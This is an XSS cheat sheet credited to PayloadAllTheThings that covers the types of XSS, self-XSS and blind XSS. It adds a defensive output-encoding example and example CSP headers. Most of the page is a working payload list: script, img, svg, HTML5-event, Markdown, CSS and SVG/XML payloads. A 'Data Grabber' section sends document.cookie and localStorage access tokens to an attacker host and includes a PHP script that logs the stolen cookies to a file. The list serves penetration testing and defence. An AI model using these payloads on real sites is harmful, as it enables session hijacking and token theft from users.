Cross Site Scripting (XSS)
Cross-Site Scripting (XSS) is a web vulnerability that allows attackers to inject malicious scripts into web pages viewed by users. These scripts can steal cookies, session tokens, or perform actions on behalf of users.
Types of XSS:
- Stored – Script is saved on the server and served to users.
- Reflected – Script is in the URL or input and reflected back.
- DOM-based – Client-side scripts modify the page DOM insecurely.
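The standard mitigation for stored and reflected XSS (and for DOM-based XSS whenever untrusted data has to be written as HTML) is context-aware output encoding at the point where the data enters the page. The block below is an added example, not code from the original page; the search-page template, the inert check and the sample inputs (lifted from the payload lists further down) are constructed for illustration.

```javascript
// Added example (not from the original page): context-aware output encoding,
// the standard fix for reflected and stored XSS. One encoder per output context.
// HTML text context: neutralise the characters that can start markup.
function encodeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Quoted HTML attribute context: escape everything except alphanumerics, so
// neither `">` (break-out) nor ` onerror=` (new handler) survives.
function encodeHtmlAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => `&#x${c.charCodeAt(0).toString(16)};`);
}

// JavaScript string-literal context: \xHH / \uHHHH escapes, so a quote
// followed by `; alert(1);//` cannot terminate the literal early.
function encodeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0), hex = code.toString(16);
    return code < 0x100 ? `\\x${hex.padStart(2, "0")}` : `\\u${hex.padStart(4, "0")}`;
  });
}

// Hypothetical search page (constructed for this example) that echoes the
// untrusted `term` into three contexts, each with its matching encoder.
function renderSearchPage(term) {
  return [
    `<p>Results for: ${encodeHtml(term)}</p>`,
    `<input name="q" value="${encodeHtmlAttr(term)}">`,
    `<script>var lastSearch = '${encodeJsString(term)}';</script>`,
  ].join("\n");
}

// Constructed inputs taken from the payload lists on this page.
const SAMPLE_PAYLOADS = [
  `"><script>alert('XSS')</script>`,
  `<img src=x onerror=alert(1)>`,
  `'; alert(1);//`,
];

// The template itself writes five `<` and two `'`; any extra means the input
// introduced markup or broke out of the JavaScript string literal.
function isInert(html) {
  return (html.match(/</g) || []).length === 5 && (html.match(/'/g) || []).length === 2;
}

function allSamplesInert() {
  return SAMPLE_PAYLOADS.every((p) => isInert(renderSearchPage(p)));
}
```

Swapping encoders between contexts (HTML-encoding a value that lands inside a script block, for instance) is the usual way these payloads get through, so the encoder is chosen by where the value is written, not by what it contains.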
What is self-XSS?
Self-XSS is a social-engineering trick in which the victim is persuaded to run attacker-supplied JavaScript themselves (for example by pasting it into the browser's developer console). Since the attack requires the victim to willingly execute the code, it is not considered a vulnerability in the application's code, and most bug bounty programs mark it as out of scope.
Data Grabber
<script>document.location='http://ip:8899/XSS/grabber.php?c='+document.cookie</script>
<script>document.location='http://ip:8899/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
<script>new Image().src="http://ip:8899/cookie.php?c="+document.cookie;</script>
<script>new Image().src="http://ip:8899/cookie.php?c="+localStorage.getItem('access_token');</script>
Write the collected data into a file.
php -S localhost:8899
// grabber.php or cookie.php
<?php
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' .$cookie."\r\n");
fclose($fp);
?>
Common XSS Payloads
// Basic payload
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">
// Img payload
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<><img src=1 onerror=alert(1)>
// Svg payload
<svg onload=alert(1)>
<svg/onload=alert('XSS')>
<svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
<svg><script href=data:,alert(1) /> // Firefox is the only browser that allows a self-closing script tag
<svg><script>alert('33')
<svg><script>alert&lpar;'33'&rpar;
// Div payload
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>
// XSS Using HTML5 Tags
<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
<body ontouchstart=alert(1)> // Triggers when a finger touches the screen
<body ontouchend=alert(1)> // Triggers when a finger is lifted from the touch screen
<body ontouchmove=alert(1)> // Triggers when a finger is dragged across the screen
Cool XSS Tricks
XSS in Hidden Input
<input type="hidden" accesskey="X" onclick="alert(1)">
// Use CTRL+SHIFT+X to trigger the onclick event
In newer browsers (Firefox 130 / Chrome 108):
<input type="hidden" oncontentvisibilityautostatechange="alert(1)" style="content-visibility:auto" >
Better Payload
<script>alert(document.domain.concat("\n").concat(window.origin))</script>
While alert() is convenient for reflected XSS, it quickly becomes a burden for stored XSS because the popup has to be closed on every execution. console.log() can be used instead to write a message to the browser's developer console, which requires no interaction.
DOM Based XSS
// Based on a DOM XSS sink.
#"><img src=/ onerror=alert(2)>
XSS in JS Context
-(confirm)(document.domain)//
; alert(1);//
// Payload without single or double quotes, from @brutelogic (https://twitter.com/brutelogic)
XSS in Files
XML
NOTE: The XML CDATA section is used here so that the JavaScript payload will not be treated as XML markup.
<name>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
</name>
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
</body>
</html>
SVG
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
Short SVG Payloads:
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
Markdown
[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)
CSS
<!DOCTYPE html>
<html>
<head>
<style>
div {
background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
background-color: #cccccc;
}
</style>
</head>
<body>
<div>lol</div>
</body>
</html>
Blind XSS
Blind XSS occurs when malicious JavaScript is injected into a page but executed in a different context (e.g., admin panel) where the attacker can't see the result directly.
XSS Hunter
- Sign up at XSS Hunter and get a unique payload.
- Choose a payload and inject it into suspected input fields.
- When a vulnerable page loads the payload, XSS Hunter notifies you with request/DOM details, confirming blind XSS.
Self-hosting option: https://github.com/mandatoryprogrammer/xsshunter-express
Common blind XSS endpoints
- Contact forms
- Ticket support
- Referer Header
- Custom Site Analytics
- Administrative Panel logs
- User Agent
- Comment Box
- Administrative Panel
The data grabber technique described above can also be used for blind XSS testing.
CSP Bypass
A tool designed to help ethical hackers bypass restrictive Content Security Policies (CSP) and exploit XSS (Cross-Site Scripting) vulnerabilities on sites where injections are blocked by CSPs that only allow certain whitelisted domains.
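The two policy shapes that sentence contrasts, as an added example that is not from the original page or from the tool it describes; the CDN host and the nonce value are placeholders.

```http
# Weak: a host allow-list. Any script already served from an allow-listed
# origin (for example a JSONP endpoint) is a valid source, so an injection
# that points at it is not blocked. This is the kind of CSP bypass tooling targets.
Content-Security-Policy: script-src 'self' https://cdn.example.com

# Stronger: a fresh nonce per response plus 'strict-dynamic'. Supporting browsers
# ignore the host list and run only <script nonce="..."> tags the server emitted
# (and scripts those load). object-src 'none' also shuts the <object data=javascript:>
# payload listed above; base-uri 'none' stops <base> injection from redirecting
# relative script URLs.
Content-Security-Policy: script-src 'nonce-RANDOM_PER_RESPONSE' 'strict-dynamic'; object-src 'none'; base-uri 'none'
```

The nonce must be unpredictable and regenerated on every response; a static or guessable nonce reduces the second policy to the first.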
Credit: PayloadAllTheThings